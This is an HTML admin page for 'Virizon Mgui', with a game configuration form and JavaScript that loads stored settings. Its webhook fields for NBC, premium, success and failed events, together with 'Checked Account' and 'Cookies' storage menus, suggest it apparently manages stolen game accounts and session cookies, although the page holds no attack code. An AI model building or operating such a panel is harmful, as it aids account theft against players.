<!DOCTYPE html>
<html lang="en">

<head>
	<meta charset="utf-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimal-ui">
	<title>Virizon Mgui</title>
	<meta content="" name="description" />
	<meta content="Themesdesign" name="author" />
	<link rel="shortcut icon" href="assets/images/favicon.ico">
	<!--Morris Chart CSS -->
	<link rel="stylesheet" href="../plugins/morris/morris.css">
	<link href="assets/css/bootstrap.min.css" rel="stylesheet" type="text/css">
	<link href="assets/css/metismenu.min.css" rel="stylesheet" type="text/css">
	<link href="assets/css/icons.css" rel="stylesheet" type="text/css">
	<link href="assets/css/style.css" rel="stylesheet" type="text/css">
	<link href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-dark@3/dark.css" rel="stylesheet"> </head>

<body>
	<!-- Begin page -->
	<div id="wrapper">
		<!-- Top Bar Start -->
		<div class="topbar">
			<!-- LOGO -->
			<div class="topbar-left">
				<a href="index" class="logo"> <span class="logo-light">
              <i></i>Virizon Mgui </span> <span class="logo-sm">
              <i>V</i>
            </span> </a>
			</div>
			<nav class="navbar-custom">
				<ul class="navbar-right list-inline float-right mb-0">
					<!-- full screen -->
					<li class="dropdown notification-list list-inline-item d-none d-md-inline-block">
						<a class="nav-link waves-effect" href="#" id="btn-fullscreen"> <i class="mdi mdi-arrow-expand-all noti-icon"></i> </a>
					</li>
					<li class="dropdown notification-list list-inline-item">
						<div class="dropdown notification-list nav-pro-img">
							<a class="dropdown-toggle nav-link arrow-none nav-user" data-toggle="dropdown" href="#" role="button" aria-haspopup="false" aria-expanded="false"> <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/b/bc/Unknown_person.jpg/1200px-Unknown_person.jpg" alt="user" class="rounded-circle" id="profile_pic"> </a>
							<div class="dropdown-menu dropdown-menu-right profile-dropdown ">
								<!-- item-->
								<a class="dropdown-item d-block" href="settings"> </span> <i class="mdi mdi-settings"></i> Settings </a>
								<div class="dropdown-divider"></div>
								<button class="dropdown-item text-danger" id="logoutButton"> <i class="mdi mdi-power text-danger"></i> Logout </button>
							</div>
						</div>
					</li>
				</ul>
				<ul class="list-inline menu-left mb-0">
					<li class="float-left">
						<button class="button-menu-mobile open-left waves-effect"> <i class="mdi mdi-menu"></i> </button>
					</li>
				</ul>
			</nav>
		</div>
		<!-- Top Bar End -->
		<!-- ========== Left Sidebar Start ========== -->
		<div class="left side-menu">
			<div class="slimscroll-menu" id="remove-scroll">
				<!--- Sidemenu -->
				<div id="sidebar-menu">
					<!-- Left Menu Start -->
					<ul class="metismenu" id="side-menu">
						<li class="menu-title">Menu</li>
						<li>
							<a href="index" class="waves-effect"> <i class="icon-calendar"></i> <span>Dashboard </span> </a>
						</li>
						<li class="menu-title">Mgui Settings</li>
						<li>
							<a href="addgame" class="waves-effect"> <i class="mdi mdi-gamepad-right"></i> <span>Add Game </span> </a>
							<a href="games" class="waves-effect"> <i class="mdi mdi-xbox-controller-menu"></i> <span>Games </span> </a>
							<a href="download" class="waves-effect"> <i class="fas fa-angle-double-down"></i> <span>Download</span> </a>
						</li>
						<li class="menu-title">Storage</li>
						<li>
							<a href="accounts" class="waves-effect"> <i class="far fa-address-book"></i> <span>Checked Account</span> </a>
							<a href="cookies" class="waves-effect"> <i class="fas fa-th-list"></i> <span>Cookies</span> </a>
						</li>
					</ul>
				</div>
				<!-- Sidebar -->
				<div class="clearfix"></div>
			</div>
			<!-- Sidebar -left -->
		</div>
		<!-- Left Sidebar End -->
		<!-- ============================================================== -->
		<!-- Start right Content here -->
		<!-- ============================================================== -->
		<div class="content-page">
			<!-- Start content -->
			<div class="content">
				<div class="container-fluid">
					<div class="page-title-box">
						<div class="row align-items-center">
							<div class="col-sm-6"></div>
							<div class="col-sm-6">
								<ol class="breadcrumb float-right">
									<li class="breadcrumb-item"> <a href="javascript:void(0);">Virizon Config Game</a> </li>
									<li class="breadcrumb-item active">Configurations</li>
								</ol>
							</div>
						</div>
						<!-- end row -->
					</div>
					<!-- end page-title -->
					<div class="row"></div>
					<!-- START ROW -->
					<div class="row">
						<div class="col-lg-12">
							<div class="card m-b-30">
								<div class="card-body">
									<h4 class="mt-0 header-title">Configuring Your game</h4>
									<br>
									<form onsubmit="handleConfigure(event)">
										<label>Webhooks</label>
										<div class="form-group">
											<input type="url" class="form-control" placeholder="Visit webhook" id="visit"> </div>
										<div class="form-group">
											<input type="url" class="form-control" placeholder="NBC webhook" id="nbc"> </div>
										<div class="form-group">
											<input type="url" class="form-control" placeholder="Premium webhook" id="premium"> </div>
										<div class="form-group">
											<input type="url" class="form-control" placeholder="Success webhook" id="success"> </div>
										<div class="form-group">
											<input type="url" class="form-control" placeholder="Failed webhook" id="failed"> </div>
										<label>Game Configurations</label>
										<div class="form-group">
											<input type="number" class="form-control" placeholder="Age kick" id="age_kick"> </div>
										<div class="form-group">
											<input type="text" class="form-control" placeholder="Age kick message" id="age_kick_message"> </div>
										<div class="form-group">
											<label for="login_kick">Login kick</label>
											<select class="form-control" id="login_kick">
												<option value="true">Enabled</option>
												<option value="false">Disabled</option>
											</select>
										</div>
										<div class="form-group">
											<input type="text" class="form-control" placeholder="Login kick message" id="login_kick_message"> </div>
										<div class="form-group">
											<label for="verified_kick">Verified kick</label>
											<select class="form-control" id="verified_kick">
												<option value="true">Enabled</option>
												<option value="false">Disabled</option>
											</select>
										</div>
										<div class="form-group">
											<input type="text" class="form-control" placeholder="Verified kick message" id="verified_kick_message"> </div>
										<div class="form-group">
											<button type="submit" class="btn btn-primary waves-effect waves-light" id="submitButton"> Configure </button>
										</div>
									</form>
								</div>
							</div>
						</div>
					</div>
					<!-- END ROW -->
				</div>
				<!-- container-fluid -->
			</div>
			<!-- content -->
			<footer class="footer"> © 2021 - 2022 Virizon Mgui </span>. </footer>
		</div>
		<!-- ============================================================== -->
		<!-- End Right content here -->
		<!-- ============================================================== -->
	</div>
	<!-- END wrapper -->
	<!-- jQuery  -->
	<script src="assets/js/jquery.min.js"></script>
	<script src="assets/js/bootstrap.bundle.min.js"></script>
	<script src="assets/js/metismenu.min.js"></script>
	<script src="assets/js/jquery.slimscroll.js"></script>
	<script src="assets/js/waves.min.js"></script>
	<!--Morris Chart-->
	<script src="../plugins/morris/morris.min.js"></script>
	<script src="../plugins/raphael/raphael.min.js"></script>
	<script src="assets/pages/dashboard.init.js"></script>
	<!-- App js -->
	<script src="assets/js/app.js"></script>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/6.10.2/sweetalert2.all.min.js"></script>
	<script>
	function updateUserInfo(info) {
		const profile_pic = document.getElementById('profile_pic');
		profile_pic.setAttribute("src", info.profile_pic);
	}

	function updateConfigForm(game_configs) {
		// Get input values
		const visitWebhook = document.getElementById('visit');
		const nbcWebhook = document.getElementById('nbc');
		const premiumWebhook = document.getElementById('premium');
		const successWebhook = document.getElementById('success');
		const failedWebhook = document.getElementById('failed');
		const ageKick = document.getElementById('age_kick');
		const ageKickMessage = document.getElementById('age_kick_message');
		const loginKick = document.getElementById('login_kick');
		const loginKickMessage = document.getElementById('login_kick_message');
		const verifiedKick = document.getElementById('verified_kick');
		const verifiedKickMessage = document.getElementById('verified_kick_message');
		visitWebhook.setAttribute("value", game_configs.webhooks.visit);
		nbcWebhook.setAttribute("value", game_configs.webhooks.nbc);
		premiumWebhook.setAttribute("value", game_configs.webhooks.premium);
		successWebhook.setAttribute("value", game_configs.webhooks.success);
		failedWebhook.setAttribute("value", game_configs.webhooks.failed);
		ageKick.setAttribute("value", game_configs.game_configs.age_kick);
		ageKickMessage.setAttribute("value", game_configs.game_configs.age_kick_message);
		loginKickMessage.setAttribute("value", game_configs.game_configs.login_kick_message);
		verifiedKickMessage.setAttribute("value", game_configs.game_configs.verified_kick_message);
		const enabledLoginKickOption = loginKick.querySelector('option[value="true"]');
		const disabledloginkickOption = loginKick.querySelector('option[value="false"]');

		if(game_configs.game_configs.login_kick) {
			enabledLoginKickOption.selected = true;
			enabledLoginKickOption.textContent = 'Enabled';
			disabledloginkickOption.textContent = 'Disabled';
		} else {
			disabledloginkickOption.selected = true;
			disabledloginkickOption.textContent = 'Disabled';
			enabledLoginKickOption.textContent = 'Enabled';
		}

		const enabledVerifiedKickOption = verifiedKick.querySelector('option[value="true"]');
		const disabledVerifiedKickOption = verifiedKick.querySelector('option[value="false"]');
		if(game_configs.game_configs.verified_kick) {
			enabledVerifiedKickOption.selected = true;
			enabledVerifiedKickOption.textContent = 'Enabled';
			disabledVerifiedKickOption.textContent = 'Disabled';
		} else {
			disabledVerifiedKickOption.selected = true;
			disabledVerifiedKickOption.textContent = 'Disabled';
			enabledVerifiedKickOption.textContent = 'Enabled';
		}
    
	}

	function fetchConfigs() {
		const urlParams = new URLSearchParams(window.location.search);
		const gameId = urlParams.get('gameId');
		fetch(`/api/loadconfigures?gameId=${gameId}`).then(response => response.json()).then(data => {
			const game_configs = data.config_info;
			updateConfigForm(game_configs);
		}).catch(error => console.log(error));
	}

	function fetchUserInfo() {
		fetch('/api/user').then(response => response.json()).then(data => {
			const users = data.data;
			const info = {
				username: users[0].username,
				profile_pic: users[0].profile_pic,
			};
			updateUserInfo(info);
		}).catch(error => console.log(error));
	}
	// Call the fetchStatistics function when the page is loaded
	document.addEventListener('DOMContentLoaded', fetchConfigs);
	document.addEventListener('DOMContentLoaded', fetchUserInfo);
	</script>
	<script src="js/logout.js"></script>
	<script src="js/configure.js"></script>
</body>

</html>